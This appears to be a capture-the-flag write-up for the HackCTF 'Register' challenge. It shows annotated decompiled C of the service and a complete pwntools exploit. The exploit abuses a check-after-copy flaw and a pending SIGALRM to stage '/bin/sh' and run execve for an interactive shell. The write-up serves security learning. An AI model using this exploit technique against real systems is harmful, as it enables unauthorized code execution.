HackCTF - Register
/* Entry point. Arms a 5-second SIGALRM before any input is read and hands
 * off to build(), which never returns (hence __noreturn). build() installs
 * handler() for SIGALRM, so this timer is a second, input-independent path
 * into that handler -- see the comments in build(). */
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
alarm(5u);
/* Mode 2 is _IONBF on glibc: stdout is unbuffered, so each prompt is on the
 * wire before read() blocks. */
setvbuf(stdout, 0LL, 2, 0LL);
build();
}
main()
/* Service loop: read a register set from stdin, park it in the globals, and
 * trigger handler() via SIGALRM once the syscall number passes the
 * allow-list. Never returns.
 *
 * v0..v6 are one contiguous 56-byte stack object, not seven independent
 * locals: get_obj(&v0) writes a1[0..6] (RAX, RDI, RSI, RDX, RCX, R8, R9).
 * The decompiler merely split it up. */
void __noreturn build()
{
__int64 v0; // [rsp+0h] [rbp-40h]
__int64 v1; // [rsp+8h] [rbp-38h]
__int64 v2; // [rsp+10h] [rbp-30h]
__int64 v3; // [rsp+18h] [rbp-28h]
__int64 v4; // [rsp+20h] [rbp-20h]
__int64 v5; // [rsp+28h] [rbp-18h]
__int64 v6; // [rsp+30h] [rbp-10h]
unsigned __int64 v7; // [rsp+38h] [rbp-8h]
/* Stack-protector canary load; compiler-generated, not program logic. */
v7 = __readfsqword(0x28u);
/* 14 == SIGALRM. handler() is not in this listing; the exploit below relies
 * on it issuing a syscall from obj / qword_6010A8..qword_6010D0. The same
 * signal is also delivered by the alarm(5) armed in main(). */
signal(14, (__sighandler_t)handler);
while ( 1 )
{
do
{
get_obj(&v0);
/* The intended bug: the register set is committed to the globals BEFORE
 * validate_syscall_obj() has looked at RAX. A rejected number (e.g.
 * 0x3b/execve) never reaches raise(14), but it stays in the globals while
 * the loop blocks in get_obj() -- and main()'s pending alarm can deliver
 * SIGALRM at exactly that point. The fix is to validate v0 first and copy
 * only on success (and not to leave a timer pointing at the same handler). */
obj = v0;
qword_6010A8 = v1;
qword_6010B0 = v2;
qword_6010B8 = v3;
qword_6010C0 = v4;
qword_6010C8 = v5;
qword_6010D0 = v6;
}
/* validate_syscall_obj() returns 0 for an allowed number (0/1/2/3/60) and
 * 1 otherwise, so this keeps re-prompting until RAX is allowed. */
while ( (unsigned int)validate_syscall_obj(v0) );
/* Synchronous SIGALRM: handler() runs with the validated register set. */
raise(14);
}
}
build()
/* Prompts for a full register set and stores it in a1[0..6] in the order
 * RAX, RDI, RSI, RDX, RCX, R8, R9 (a1 must point at seven _QWORDs).
 * Each value is parsed by get_ll(); always returns 0. */
__int64 __fastcall get_obj(_QWORD *a1)
{
    static const char *const prompts[] = {
        "RAX: ", "RDI: ", "RSI: ", "RDX: ", "RCX: ", "R8: ", "R9: ",
    };
    int i;

    for (i = 0; i < (int)(sizeof prompts / sizeof prompts[0]); i++) {
        printf("%s", prompts[i]);
        a1[i] = get_ll();
    }
    return 0LL;
}
get_obj()
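/* Reads one line (at most 32 bytes) from stdin and converts it with atol():
 * non-numeric input yields 0, exactly as before.
 *
 * Review fix: the decompiled listing declared the buffer as a single
 * `char nptr` (the real frame has 40 bytes between it and the canary), and
 * get_inp() only NUL-terminates when the last byte read is '\n'. A 32-byte
 * line without a newline therefore let atol() scan past the input into
 * uninitialized stack. A zero-filled 33-byte array keeps every read
 * terminated; the canary load (__readfsqword) was compiler output and is
 * dropped. */
__int64 get_ll()
{
    char nptr[33] = {0};

    get_inp(nptr, 32);
    return atol(nptr);
}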
get_ll()
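/* Reads up to a2 bytes from stdin into a1 and strips one trailing '\n'.
 * Returns bytes read minus one (as in the original: the '\n' is not counted,
 * but a line without '\n' is also under-reported by one). The buffer is NOT
 * NUL-terminated unless a '\n' was read -- callers must handle that.
 * Exits the process on read() failure.
 *
 * Review fix: the original only checked for -1; a zero-length read (stdin at
 * EOF) then evaluated a1[-1], one byte before the caller's buffer, and the
 * caller's loop re-prompted forever. EOF now exits like an error, and a
 * non-positive size is refused instead of being passed to read() as a huge
 * size_t. */
__int64 __fastcall get_inp(void *a1, int a2)
{
    unsigned char *buf = a1;
    int n;

    if (a2 <= 0)
        return 0;
    n = read(0, buf, a2);
    if (n <= 0)
        exit(0);
    if (buf[n - 1] == '\n')
        buf[n - 1] = '\0';
    return (unsigned int)(n - 1);
}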
get_inp()
/* Allow-list check on a requested syscall number (x86-64 Linux numbering):
 * returns 0 when a1 is 0 (read), 1 (write), 2 (open), 3 (close) or 60 (exit),
 * and 1 for anything else. build() keeps re-prompting while this returns 1.
 * The decompiler rendered the compiled switch as a nested if-tree; this is
 * the same predicate written as the switch it came from. */
__int64 __fastcall validate_syscall_obj(signed __int64 a1)
{
    switch (a1) {
    case 0:
    case 1:
    case 2:
    case 3:
    case 60:
        return 0;
    default:
        return 1;
    }
}
validate_syscall_obj()
from pwn import *
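r = remote('ctf.j0n9hyun.xyz', 3026)
e = ELF('./register')

# Writable address at a fixed (non-PIE) location, used to stage "/bin/sh".
DATA = e.get_section_by_name('.data').header.sh_addr


def register(rax, rdi, rsi, rdx, rcx=0, r8=0, r9=0):
    """Answer one full round of get_obj() prompts.

    The binary copies all seven values into its globals *before*
    validate_syscall_obj() checks RAX, so a rejected RAX (anything other
    than 0/1/2/3/60) is still left behind in the globals.
    Prompts and values are sent as bytes for pwntools 4 / Python 3.
    """
    for prompt, value in (
        (b'RAX: ', rax), (b'RDI: ', rdi), (b'RSI: ', rsi), (b'RDX: ', rdx),
        (b'RCX: ', rcx), (b'R8: ', r8), (b'R9: ', r9),
    ):
        r.sendlineafter(prompt, str(value).encode())


# 1) read(0, .data, 10): RAX=0 passes the allow-list, so build() calls
#    raise(14) and the SIGALRM handler (not in the listing; assumed to issue
#    the stored syscall) reads our string into .data.
register(0, 0, DATA, 10)
r.send(b'/bin/sh\x00')

# 2) execve(.data, 0, 0): RAX=0x3b is rejected, so the loop only re-prompts
#    -- but the register set has already been stored in the globals.
register(0x3b, DATA, 0, 0)

# 3) main() armed alarm(5) at startup. When it fires, the handler runs with
#    the stored execve registers; wait for it instead of sending more input.
sleep(5)
r.interactive()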
Exploit. The service copies the seven entered registers into its globals before validate_syscall_obj() checks RAX, so an execve (0x3b) request is rejected by the prompt loop but remains stored; when the alarm(5) armed in main() fires, the SIGALRM handler (not shown above, but relied on here to issue the stored syscall) runs with those globals. The first round therefore uses the allowed read (RAX=0) to place "/bin/sh" in .data, the second stages execve(.data, 0, 0), and the script then simply waits for the alarm.